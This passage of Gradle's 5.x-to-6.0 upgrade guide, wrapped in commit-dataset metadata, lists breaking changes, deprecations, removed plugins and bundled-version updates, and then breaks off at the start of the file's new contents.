6.0 supports Android Gradle Plugin versions 3.4 and later.\n\n==== Archive tasks fail on duplicate files\n\nUntil now archive tasks defaulted to the `INCLUDE` duplicates strategy, allowing the same path to exist multiple times in an archive.\n\nIn Gradle 6.0 we are switching to `FAIL`, prohibiting duplicate files in archives.\nIf you still want to allow them, you can be specify that explicitly:\n\n```\ntask archive(type: Zip) {\n duplicatesStrategy = DuplicatesStrategy.INCLUDE \/\/ allow duplicates\n archiveName = 'archive.zip'\n from 'src'\n}\n```\n\n*Note* that `Copy` and `Sync` tasks are unaffected: they still use the `INCLUDE` duplicates strategy as default.\n\n==== Local build cache is always a directory cache\n\nIn the past it was possible to use any build cache implementation as the `local` cache.\nThis is not allowed anymore as the local cache is always a `DirectoryBuildCache`.\nCalls to `BuildCacheConfiguration.local(Class)` with anything other than `DirectoryBuildCache` as the type will fail the build.\nCalling these methods with the `DirectoryBuildCache` type will produce a deprecation warning.\nUse `getLocal()` and `local(Action)` instead, respectively.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n==== Failing to pack or unpack cached results will now fail the build\n\nIn the past when Gradle encountered a problem while packaging the results of a cached task, it would ignore the problem and try to continue running the build.\nSimilarly, having encountered a corrupt cached artifact during unpacking Gradle would try to remove whatever was already unpacked of the output and re-execute the task to make sure the build had a chance to succeed.\n\nWhile this behavior could be helpful to maintain executing build no matter what, hiding the problems this way can lead to reduced cache performance.\nIn Gradle 6.0 we are switching to failing fast, and both pack and unpack errors will result the build to fail.\nDoing so allows these problems to be surfaced more easily.\n\n==== Gradle Module Metadata is always published\n\n[Gradle Module Metadata](https:\/\/blog.gradle.org\/gradle-metadata-1.0), officially introduced in Gradle 5.3, was created to solve many of the problems that have plagued dependency management for years, in particular, but not exclusively, in the Java ecosystem.\nWith Gradle 6.0, Gradle Module Metadata is enabled by default.\nThis means, if you are publishing libraries with Gradle, using the <<publishing_maven.adoc#,maven-publish>> or <<publishing_ivy.adoc#,ivy-publish>> plugin, the Gradle Module Metadata file is always published *in addition* to the traditional metadata.\nThe traditional metadata file will contain a marker so that Gradle knows that there is additional metadata to consume.\n\n==== Maven or Ivy repositories are no longer queried for artifacts without metadata by default\n\nIf Gradle fails to locate the metadata file (`.pom` or `ivy.xml`) of a module in a repository defined in the `repositories { }` section, it now assumes that the module does not exist in that repository.\nSimilar, for dynamic versions, the `metadata.xml` for the corresponding module needs to be present in a Maven repository.\nPreviously, Gradle was also looking for a default artifact (`.jar`) which usually also does not exist.\nThis often caused large number of unnecessary requests when using multiple repositories.\nThis change speeds up builds with many dependencies using multiple repositories.\nYou can opt into the previous behavior for selected repositories by adding the `artifact()` <<declaring_repositories.adoc#sec:supported_metadata_sources,metadata source>>.\n\n==== buildSrc classes are no longer visible from settings scripts\n\nPreviously, the buildSrc project was built before applying the project's settings script and its classes were visible within the script.\nNow, buildSrc is built after the settings script and its classes are not visible to it.\nThe buildSrc classes remain visible to project build scripts and script plugins.\n\nCustom logic can be used from a settings script by <<tutorial_using_tasks.adoc#sec:build_script_external_dependencies, declaring external dependencies>>.\n\n==== `@Nullable` annotation is gone\n\nThe `org.gradle.api.Nullable` annotation type has been removed. Use `javax.annotation.Nullable` from JSR-305 instead.\n\n==== Plugin validation changes\n\n- The `validateTaskProperties` task is now deprecated, use `validatePlugins` instead.\n The new name better reflects the fact that it also validates artifact transform parameters and other non-property definitions.\n- The `ValidateTaskProperties` type is replaced by `ValidatePlugins`.\n- The `setClasses()` method is now removed. Use `getClasses().setFrom()` instead.\n- The `setClasspath()` method is also removed. use `getClasspath().setFrom()` instead.\n- The link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html#getFailOnWarning--[failOnWarning] option is now enabled by default.\n- The following task validation errors now fail the build at runtime and are promoted to errors for link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html[ValidatePlugins]:\n * A task property is annotated with a property annotation not allowed for tasks, like `@InputArtifact`.\n\n==== `DefaultTask` and `ProjectLayout` methods replaced with `ObjectFactory`\n\nUse `ObjectFactory.fileProperty()` instead of the following methods that are now removed:\n\n- `DefaultTask.newInputFile()`\n- `DefaultTask.newOutputFile()`\n- `ProjectLayout.fileProperty()`\n\nUse `ObjectFactory.directoryProperty()` instead of the following methods that are now removed:\n\n- `DefaultTask.newInputDirectory()`\n- `DefaultTask.newOutputDirectory()`\n- `ProjectLayout.directoryProperty()`\n\n==== The FindBugs plugin has been removed\n\nThe deprecated FindBugs plugin has been removed.\nAs an alternative, you can use the link:https:\/\/plugins.gradle.org\/plugin\/com.github.spotbugs[SpotBugs plugin] from the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The JDepend plugin has been removed\n\nThe deprecated JDepend plugin has been removed.\nThere are a number of community-provided plugins for code and architecture analysis available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The OSGI plugin has been removed\n\nThe deprecated OSGI plugin has been removed. There are a number of community-provided OSGI plugins available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The announce and build-announcements plugins have been removed\n\nThe deprecated announce and build-announcements plugins have been removed. There are a number of community-provided plugins for sending out notifications available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The Compare Gradle Builds plugin has been removed\n\nThe deprecated Compare Gradle Builds plugin has been removed.\nPlease use https:\/\/scans.gradle.com\/[build scans] for build analysis and comparison.\n\n==== Changes to the task container\n\nThe following deprecated methods on the task container now result in errors:\n\n- `TaskContainer.add()`\n- `TaskContainer.addAll()`\n- `TaskContainer.remove()`\n- `TaskContainer.removeAll()`\n- `TaskContainer.retainAll()`\n- `TaskContainer.clear()`\n- `TaskContainer.iterator().remove()`\n\nAdditionally, the following deprecated functionality now results in an error:\n\n- Replacing a task that has already been realized.\n- Replacing a registered (unrealized) task with an incompatible type. A compatible type is the same type or a sub-type of the registered type.\n- Replacing a task that has never been registered.\n\n==== `AbstractCompile.compile()` is gone\n\nThe abstract method `compile()` is no longer declared by `AbstractCompile`.\nTasks extending `AbstractCompile` can implement their own `@TaskAction` method with the name of their choosing.\nThey are also free to add a `@TaskAction` method with an `InputChanges` parameter without having to implement a parameter-less one as well.\n\n==== Using the `embedded-kotlin` plugin now requires a repository\n\nJust like when using the `kotlin-dsl` plugin, it is now required to declare a repository where Kotlin dependencies can be found if you apply the `embedded-kotlin` plugin.\n\n```kotlin\nplugins {\n `embedded-kotlin`\n}\n\nrepositories {\n jcenter()\n}\n```\n\n==== Kotlin DSL IDE support now requires Kotlin IntelliJ Plugin >= 1.3.50\n\nWith Kotlin IntelliJ plugin versions prior to 1.3.50, Kotlin DSL scripts will be wrongly highlighted when the _Gradle JVM_ is set to a version different from the one in _Project SDK_.\nSimply upgrade your IDE plugin to a version >= 1.3.50 to restore the correct Kotlin DSL script highlighting behavior.\n\n==== Updates to bundled Gradle dependencies\n\n- Groovy has been updated to http:\/\/groovy-lang.org\/changelogs\/changelog-2.5.8.html[Groovy 2.5.8].\n- Kotlin has been updated to https:\/\/blog.jetbrains.com\/kotlin\/2019\/08\/kotlin-1-3-50-released\/[Kotlin 1.3.50].\n\n==== Updates to default integration versions\n\n- Checkstyle has been updated to https:\/\/checkstyle.org\/releasenotes.html#Release_8.24[Checkstyle 8.24].\n- CodeNarc has been updated to https:\/\/github.com\/CodeNarc\/CodeNarc\/blob\/master\/CHANGELOG.md#version-14---may-2019[CodeNarc 1.4].\n- PMD has been updated to https:\/\/pmd.github.io\/latest\/pmd_release_notes.html#28-july-2019---6170[PMD 6.17.0].\n\n==== Javadoc and Groovydoc don't include timestamps by default\n\nTimestamps in the generated documentation have very limited practical use, however they make it impossible to have repeatable documentation builds.\nTherefore, the `Javadoc` and `Groovydoc` tasks are now configured to not include timestamps by default any more.\n\n==== User provided 'config_loc' properties are ignored by Checkstyle\n\nGradle always uses `configDirectory` as the value for 'config_loc' when running Checkstyle.\n\n==== Changing the pom packaging no longer changes the artifact extension\n\nPreviously, the extension of the main artifact published to a Maven repository, typically a _jar_, was changed during publishing if the pom packaging was not _jar_, _ejb_, _bundle_ or _maven-plugin_.\nThis behavior let to broken Gradle Module Metadata and was difficult to understand due to different handling of different packaging types.\nBuild authors can change the artifact name when the artifact is created to obtain the same result as before - e.g. by setting `jar.archiveExtension.set(pomPackaging)`.\n\n==== Ivy.xml published for Java libraries contains more information\n\nA number of fixes were made to produce more correct `ivy.xml` metadata in the `ivy-publish` plugin.\nAs a consequence, the internal structure of the `ivy.xml` file has changed.\nHowever, selecting the `default` configuration yields the same result as before.\nOnly the `runtime` configuration now contains more information which corresponds to the _runtimeElements_ variant of a Java library.\nIn general, users are advised to migrate from `ivy.xml` to the new Gradle Module Metadata format.\n\n==== Calling afterEvaluate on an evaluated project has been deprecated\n\nOnce a project is evaluated, Gradle ignores all configuration passed to `Project#afterEvaluate` and emits a deprecation warning. This scenario will become an error in Gradle 7.0.\nUntil then, a deprecation warning will be shown.\n\n==== Miscellaneous\n\nThe following breaking changes will appear as deprecation warnings with Gradle 5.6:\n\n* The `org.gradle.util.GUtil.savePropertiesNoDateComment` has been removed. There is no public replacement for this internal method.\n* The deprecated class `org.gradle.api.tasks.compile.CompilerArgumentProvider` has been removed.\n Use link:{javadocPath}\/org\/gradle\/process\/CommandLineArgumentProvider.html[org.gradle.process.CommandLineArgumentProvider] instead.\n* The deprecated class `org.gradle.api.ConventionProperty` has been removed.\n Use link:{javadocPath}\/org\/gradle\/api\/provider\/Provider.html[Providers] instead of convention properties.\n* The deprecated class `org.gradle.reporting.DurationFormatter` has been removed.\n* The bridge method `org.gradle.api.tasks.TaskInputs.property(String name, @Nullable Object value)` returning `TaskInputs` has been removed.\n A plugin using the method must be compiled with Gradle 4.3 to work on Gradle 6.0.\n* The following setters have been removed from `JacocoReportBase`:\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:executionData[executionData] - use `getExecutionData().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:sourceDirectories[sourceDirectories] - use `getSourceDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:classDirectories[classDirectories] - use `getClassDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalClassDirs[additionalClassDirs] - use `getAdditionalClassDirs().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalSourceDirs[additionalSourceDirs] - use `getAdditionalSourceDirs().setFrom()` instead.\n* The `append` property on `JacocoTaskExtension` has been removed.\n `append` is now always configured to be true for the Jacoco agent.\n* The `configureDefaultOutputPathForJacocoMerge` method on `JacocoPlugin` has been removed.\n The method was never meant to be public.\n* File paths in link:{javadocPath}\/org\/gradle\/plugins\/ear\/descriptor\/DeploymentDescriptor.html#getFileName--[deployment descriptor file name] for the ear plugin are not allowed any more.\n Use a simple name, like `application.xml`, instead.\n* The `org.gradle.testfixtures.ProjectBuilder` constructor has been removed. Please use `ProjectBuilder.builder()` instead.\n* When <<groovy_plugin.adoc#sec:incremental_groovy_compilation,incremental Groovy compilation>> is enabled, a wrong configuration of the source roots or enabling Java annotation for Groovy now fails the build.\n Disable incremental Groovy compilation when you want to compile in those cases.\n* `ComponentSelectionRule` no longer can inject the metadata or ivy descriptor.\n Use the methods on the <<declaring_dependency_versions.adoc#sec:component_selection_rules,`ComponentSelection` parameter>> instead.\n* Declaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now an error.\n Declare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n* The `getEffectiveAnnotationProcessorPath()` method is removed from the `JavaCompile` and `ScalaCompile` tasks.\n* Changing the value of a task property with type `Property<T>` after the task has started execution now results in an error.\n* The `isLegacyLayout()` method is removed from `SourceSetOutput`.\n* The map returned by `TaskInputs.getProperties()` is now unmodifiable.\n Trying to modify it will result in an `UnsupportedOperationException` being thrown.\n\n[[changes_5.6]]\n== Upgrading from 5.5 and earlier\n\n=== Deprecations\n\n==== Changing the contents of `ConfigurableFileCollection` task properties after task starts execution\n\nWhen a task property has type `ConfigurableFileCollection`, then the file collection referenced by the property will ignore changes made to the contents of the collection once the task\nstarts execution. This has two benefits. Firstly, this prevents accidental changes to the property value during task execution which can cause Gradle up-to-date checks and build cache lookup\nusing different values to those used by the task action. Secondly, this improves performance as Gradle can calculate the value once and cache the result.\n\nThis will become an error in Gradle 6.0.\n\n==== Creating `SignOperation` instances\n\nCreating `SignOperation` instances directly is now deprecated. Instead, the methods of `SigningExtension` should be used to create these instances.\n\nThis will become an error in Gradle 6.0.\n\n==== Declaring an incremental task without outputs\n\nDeclaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now deprecated.\nDeclare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n\nThis will become an error in Gradle 6.0.\n\n==== `WorkerExecutor.submit()` is deprecated\n\nThe `WorkerExecutor.submit()` method is now deprecated.\nThe new `noIsolation()`, `classLoaderIsolation()` and `processIsolation()` methods should now be used to submit work.\nSee <<custom_tasks.adoc#using-the-worker-api, the userguide>> for more information on using these methods.\n\n`WorkerExecutor.submit()` will be removed in Gradle 7.0.\n\n=== Potential breaking changes\n\n==== Task dependencies are honored for task `@Input` properties whose value is a `Property`\n\nPreviously, task dependencies would be ignored for task `@Input` properties of type `Property<T>`. These are now honored, so that it is possible to attach a task output property to a task `@Input` property.\n\nThis may introduce unexpected cycles in the task dependency graph, where the value of an output property is mapped to produce a value for an input property.\n\n==== Declaring task dependencies using a file `Provider` that does not represent a task output\n\nPreviously, it was possible to pass `Task.dependsOn()` a `Provider<File>`, `Provider<RegularFile>` or `Provider<Directory>` instance that did not represent a task output. These providers would be silently ignored.\n\nThis is now an error because Gradle does not know how to build files that are not task outputs.\n\n*Note* that it is still possible to to pass `Task.dependsOn()` a `Provider` that returns a file and that represents a task output, for example `myTask.dependsOn(jar.archiveFile)` or `myTask.dependsOn(taskProvider.flatMap { it.outputDirectory })`, when the `Provider` is an annotated `@OutputFile` or `@OutputDirectory` property of a task.\n\n==== Setting `Property` value to `null` uses the property convention\n\nPreviously, calling `Property.set(null)` would always reset the value of the property to 'not defined'. Now, the convention that is associated with the property using the `convention()` method\nwill be used to determine the value of the property.\n\n==== Enhanced validation of names for `publishing.publications` and `publishing.repositories`\n\nThe repository and publication names are used to construct task names for publishing. It was possible to supply a name that would result in an invalid task name. Names for publications and repositories are now restricted to `[A-Za-z0-9_\\\\-.]+`.\n\n==== Restricted Worker API classloader and process classpath\n\nGradle now prevents internal dependencies (like Guava) from leaking into the classpath used by Worker API actions. This fixes link:https:\/\/github.com\/gradle\/gradle\/issues\/3698[an issue] where a worker needs to use a dependency that is also used by Gradle internally.\n\nIn previous releases, it was possible to rely on these leaked classes. Plugins relying on this behavior will now fail. To fix the plugin, the worker should explicitly include all required dependencies in its classpath.\n\n==== Default PMD version upgraded to 6.15.0\n\n<<pmd_plugin#pmd_plugin, The PMD plugin>> has been upgraded to use link:https:\/\/pmd.github.io\/pmd-6.15.0\/pmd_release_notes.html[PMD version 6.15.0] instead of 6.8.0 by default.\n\nContributed by link:https:\/\/github.com\/wreulicke[wreulicke]\n\n==== Configuration copies have unique names\n\nPreviously, all copies of a configuration always had the name `<OriginConfigurationName>Copy`. Now when creating multiple copies, each will have a unique name by adding an index starting from the second copy. (e.g. `CompileOnlyCopy2`)\n\n==== Changed classpath filtering for Eclipse\n\nGradle 5.6 no longer supplies custom classpath attributes in the Eclipse model. Instead, it provides the attributes for link:https:\/\/www.eclipse.org\/eclipse\/news\/4.8\/jdt.php#jdt-test-sources[Eclipse test sources]. This change requires Buildship version 3.1.1 or later.\n\n==== Embedded Kotlin upgraded to 1.3.41\n\nGradle Kotlin DSL scripts and Gradle Plugins authored using the `kotlin-dsl` plugin are now compiled using Kotlin 1.3.41.\n\nPlease see the Kotlin link:https:\/\/blog.jetbrains.com\/kotlin\/2019\/06\/kotlin-1-3-40-released\/[blog post] and link:https:\/\/github.com\/JetBrains\/kotlin\/blob\/1.3.40\/ChangeLog.md[changelog] for more information about the included changes.\n\nThe minimum supported Kotlin Gradle Plugin version is now 1.2.31. Previously it was 1.2.21.\n\n==== Automatic capability conflict resolution\n\nPrevious versions of Gradle would automatically select, in case of capability conflicts, the module which has the highest capability version.\nStarting from 5.6, this is an opt-in behavior that can be activated using:\n\n```\nconfigurations.all {\n resolutionStrategy.capabilitiesResolution.all { selectHighestVersion() }\n}\n```\n\nSee <<controlling_transitive_dependencies.adoc#sub:capabilities, the capabilities section of the documentation>> for more options.\n\n==== File removal operations don't follow symlinked directories\n\nWhen Gradle has to remove the output files of a task for various reasons, it will not follow symlinked directories.\nThe symlink itself will be deleted, but the contents of the linked directory will stay intact.\n\n=== Disabled debug argument parsing in JavaExec\n\nGradle 5.6 introduced a new DSL element (`JavaForkOptions.debugOptions(Action<JavaDebugOptions>)`) to configure debug properties for forked Java processes. Due to this change, Gradle no longer parses debug-related JVM arguments. Consequently, `JavaForkOptions.getDebu()` no longer returns `true` if the `-Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=5005` or the `-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=5005` argument is specified to the process.\n\n=== Scala 2.9 and Zinc compiler\n\nGradle no longer supports building applications using Scala 2.9.\nThe Zinc compiler has been upgraded to 1.2.5 and requires Scala 2.10.\n\n[[changes_5.5]]\n== Upgrading from 5.4 and earlier\n\n=== Deprecations\n\n==== Play\n\nThe built-in <<play_plugin.adoc#play_plugin, Play plugin>> has been deprecated and will be replaced by a new link:https:\/\/gradle.github.io\/playframework[Play Framework plugin] available from the plugin portal.\n\n==== Build Comparison\n\nThe _build comparison_ plugin has been deprecated and will be removed in the next major version of Gradle.\n\nlink:https:\/\/gradle.com\/build-scans[Build scans] show much deeper insights into your build and you can use link:https:\/\/gradle.com\/[Gradle Enterprise] to directly compare two build's build-scans.\n\n=== Potential breaking changes\n\n==== User supplied Eclipse project names may be ignored on conflict\n\nProject names configured via link:{javadocPath}\/org\/gradle\/plugins\/ide\/eclipse\/model\/EclipseProject.html[`EclipseProject.setName(...)`] were honored by Gradle and Buildship in all cases, even\nwhen the names caused conflicts and import\/synchronization errors.\n\nGradle can now deduplicate these names if they conflict with other project names in an Eclipse workspace. This may lead to different Eclipse project names for projects with user-specified names.\n\nThe upcoming 3.1.1 version of Buildship is required to take advantage of this behavior.\n\nContributed by link:https:\/\/github.com\/fraenkelc[Christian Fr\u00e4nkel]\n\n==== Default JaCoCo version upgraded to 0.8.4\n\n<<jacoco_plugin#jacoco_plugin, The JaCoCo plugin>> has been upgraded to use link:http:\/\/www.jacoco.org\/jacoco\/trunk\/doc\/changes.html[JaCoCo version 0.8.4] instead of 0.8.3 by default.\n\nContributed by link:https:\/\/github.com\/Godin[Evgeny Mandrikov]\n\n==== Embedded Ant version upgraded to 1.9.14\n\nThe version of Ant distributed with Gradle has been upgraded to link:https:\/\/archive.apache.org\/dist\/ant\/RELEASE-NOTES-1.9.14.html[1.9.14] from 1.9.13.\n\n==== `DependencyHandler` now statically exposes `ExtensionAware`\n\nThis affects Kotlin DSL build scripts that make use of `ExtensionAware` extension members such as the `extra` properties accessor inside the `dependencies {}` block. The receiver for those members will no longer be the enclosing `Project` instance but the `dependencies` object itself, the innermost `ExtensionAware` conforming receiver. In order to address `Project` extra properties inside `dependencies {}` the receiver must be explicitly qualified i.e. `project.extra` instead of just `extra`. Affected extensions also include `the<T>()` and `configure<T>(T.() -> Unit)`.\n\n==== Improved processing of dependency excludes\n\nPrevious versions of Gradle could, in some complex dependency graphs, have a wrong result or a randomized dependency order when lots of excludes were present.\nTo mitigate this, the algorithm that computes exclusions has been rewritten.\nIn some rare cases this may cause some differences in resolution, due to the correctness changes.\n\n==== Improved classpath separation for worker processes\n\nThe system classpath for worker daemons started by the <<custom_tasks.adoc#worker_api, Worker API>> when using `PROCESS` isolation has been reduced to a minimum set of Gradle infrastructure. User code is still segregated into a separate classloader to isolate it from the Gradle runtime. This should be a transparent change for tasks using the worker API, but previous versions of Gradle mixed user code and Gradle internals in the worker process. Worker actions that rely on things like the `java.class.path` system property may be affected, since `java.class.path` now represents only the classpath of the Gradle internals.\n\n[[changes_5.4]]\n== Upgrading from 5.3 and earlier\n\n=== Deprecations\n\n==== Using custom local build cache implementations\n\nUsing a custom build cache implementation for the local build cache is now deprecated.\nThe only allowed type will be `DirectoryBuildCache` going forward.\nThere is no change in the support for using custom build cache implementations as the remote build cache.\n\n=== Potential breaking changes\n\n==== Use HTTPS when configuring Google Hosted Libraries via `googleApis()`\n\nThe Google Hosted Libraries URL accessible via `JavaScriptRepositoriesExtension#GOOGLE_APIS_REPO_URL` was changed to use the HTTPS protocol.\nThe change also affect the Ivy repository configured via `googleApis()`.\n\n[[changes_5.3]]\n== Upgrading from 5.2 and earlier\n\n=== Potential breaking changes\n\n==== Bug fixes in platform resolution\n\nThere was a bug from Gradle 5.0 to 5.2.1 (included) where enforced platforms would potentially include dependencies instead of constraints.\nThis would happen whenever a POM file defined both dependencies and \"constraints\" (via `<dependencyManagement>`) and that you used `enforcedPlatform`.\nGradle 5.3 fixes this bug, meaning that you might have differences in the resolution result if you relied on this broken behavior.\nSimilarly, Gradle 5.3 will no longer try to download jars for `platform` and `enforcedPlatform` dependencies (as they should only bring in constraints).\n\n==== Automatic target JVM version\n\nIf you apply any of the Java plugins, Gradle will now do its best to select dependencies which match the target compatibility of the module being compiled.\nWhat it means, in practice, is that if you have module A built for Java 8, and module B built for Java 8, then there's no change.\nHowever if B is built for Java 9+, then it's not binary compatible anymore, and Gradle would complain with an error message like the following:\n\n```\nUnable to find a matching variant of project :producer:\n - Variant 'apiElements' capability test:producer:unspecified:\n - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n - Required org.gradle.usage 'java-api' and found compatible value 'java-api-jars'.\n - Variant 'runtimeElements' capability test:producer:unspecified:\n - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n - Required org.gradle.usage 'java-api' and found compatible value 'java-runtime-jars'.\n```\n\nIn general, this is a sign that your project is misconfigured and that your dependencies are not compatible.\nHowever, there are cases where you still may want to do this, for example when only a _subset_ of classes of your module actually need the Java 9 dependencies, and are not intended to be used on earlier releases.\nJava in general doesn't encourage you to do this (you should split your module instead), but if you face this problem, you can workaround by disabling this new behavior on the consumer side:\n\n```\njava {\n disableAutoTargetJvm()\n}\n```\n\n==== Bug fix in Maven \/ Ivy interoperability with dependency substitution\n\nIf you have a Maven dependency pointing to an Ivy dependency where the `default` configuration dependencies do not match the `compile` + `runtime` + `master` ones\n_and_ that Ivy dependency was substituted (using a `resolutionStrategy.force`, `resolutionStrategy.eachDependency` or `resolutionStrategy.dependencySubstitution`)\nthen this fix will impact you.\nThe legacy behaviour of Gradle, prior to 5.0, was still in place instead of being replaced by the changes introduced by improved pom support.\n\n==== Delete operations correctly handle symbolic links on Windows\n\nGradle no longer ignores the `followSymlink` option on Windows for the `clean` task, all `Delete` tasks, and `project.delete {}` operations in the presence of junction points and symbolic links.\n\n==== Fix in publication of additional artifacts\n\nIn previous Gradle versions, additional artifacts registered at the project level were not published by `maven-publish` or `ivy-publish` unless they were also added as artifacts in the publication configuration.\n\nWith Gradle 5.3, these artifacts are now properly accounted for and published.\n\nThis means that artifacts that are registered both on the project _and_ the publication, Ivy or Maven, will cause publication to fail since it will create duplicate entries.\nThe fix is to remove these artifacts from the publication configuration.\n\n[[changes_5.2]]\n== Upgrading from 5.1 and earlier\n\n=== Potential breaking changes\n\nnone\n\n[[changes_5.1]]\n== Upgrading from 5.0 and earlier\n\n=== Deprecations\n\nFollow the API links to learn how to deal with these deprecations (if no extra information is provided here):\n\n * Setters for `classes` and `classpath` on link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidateTaskProperties.html[`ValidateTaskProperties`]\n\n * There should not be setters for lazy properties like link:{javadocPath}\/org\/gradle\/api\/file\/ConfigurableFileCollection.html[`ConfigurableFileCollection`]. Use `setFrom` instead. For example,\n----\n validateTaskProperties.getClasses().setFrom(fileCollection)\n validateTaskProperties.getClasspath().setFrom(fileCollection)\n----\n\n=== Potential breaking changes\n\nThe following changes were not previously deprecated:\n\n==== Signing API changes\nInput and output files of `Sign` tasks are now tracked via `Signature.getToSign()` and `Signature.getFile()`, respectively.\n\n==== Collection properties default to empty collection\n\nIn Gradle 5.0, the collection property instances created using `ObjectFactory` would have no value defined, requiring plugin authors to explicitly set an initial value. This proved to be awkward and error prone so `ObjectFactory` now returns instances with an empty collection as their initial value.\n\n==== Worker API: working directory of a worker can no longer be set\n\nSince JDK 11 no longer supports changing the working directory of a running process, setting the working directory of a worker via its fork options is now prohibited.\nAll workers now use the same working directory to enable reuse.\nPlease pass files and directories as arguments instead. See examples in the <<custom_tasks.adoc#worker_api, Worker API documentation>>.\n\n==== Changes to native linking tasks\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the install name property from `org.gradle.nativeplatform.tasks.LinkSharedLibrary` is affected by this change.\n\n- `getInstallName()` was changed to return a `Property`.\n- `setInstallName(String)` was removed. Use `Property.set()` instead.\n\n==== Passing arguments to Windows Resource Compiler\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the `WindowsResourceCompile` task has been converted to use the Provider API.\n\nPassing additional compiler arguments now follow the same pattern as the `CppCompile` and other tasks.\n\n==== Copied configuration no longer shares a list of `beforeResolve` actions with original\n\nThe list of `beforeResolve` actions are no longer shared between a copied configuration and the original.\nInstead, a copied configuration receives a copy of the `beforeResolve` actions at the time the copy is made.\nAny `beforeResolve` actions added after copying (to either configuration) will not be shared between the original and the copy.\nThis may break plugins that relied on the previous behaviour.\n\n==== Changes to incubating POM customization types\n\n- The type of `MavenPomDeveloper.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n- The type of `MavenPomContributor.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n\n==== Changes to specifying operating system for native projects\n\nThe incubating `operatingSystems` property on native components has been replaced with the link:{javadocPath}\/org\/gradle\/language\/cpp\/CppComponent.html#getTargetMachines()[targetMachines] property.\n\n==== Changes for archive tasks (`Zip`, `Jar`, `War`, `Ear`, `Tar`)\n\n===== Change in behavior for tasks extending `AbstractArchiveTask`\n\nThe `AbstractArchiveTask` has several new properties using the <<lazy_configuration.adoc#sec:lazy_configuration_reference,Provider API>>.\nPlugins that extend these types and override methods from the base class may no longer behave the same way.\nInternally, `AbstractArchiveTask` prefers the new properties and methods like `getArchiveName()` are fa\u00e7ades over the new properties.\n\nIf your plugin\/build only uses these types (and does not extend them), nothing has changed.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"17249d68f7670a6a42d8ab00270ab794db38cc29","subject":"Mention new deprecations in upgrade doc","message":"Mention new deprecations in upgrade doc\n","repos":"robinverduijn\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,blindpirate\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_contents":"\/\/ Copyright 2019 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[upgrading_version_5]]\n= Upgrading your build from Gradle 5.x to 6.0\n\nThis chapter provides the information you need to migrate your Gradle 5.x builds to Gradle 6.0. For migrating from Gradle 4.x, complete the <<upgrading_version_4.adoc#upgrading_version_4, 4.x to 5.0 guide>> first.\n\nWe recommend the following steps for all users:\n\n. Try running `gradle help --scan` and view the https:\/\/gradle.com\/enterprise\/releases\/2018.4\/#identify-usages-of-deprecated-gradle-functionality[deprecations view] of the generated build scan.\n+\nimage::deprecations.png[Deprecations View of a Gradle Build Scan]\n+\nThis is so that you can see any deprecation warnings that apply to your build.\n+\nAlternatively, you could run `gradle help --warning-mode=all` to see the deprecations in the console, though it may not report as much detailed information.\n. Update your plugins.\n+\nSome plugins will break with this new version of Gradle, for example because they use 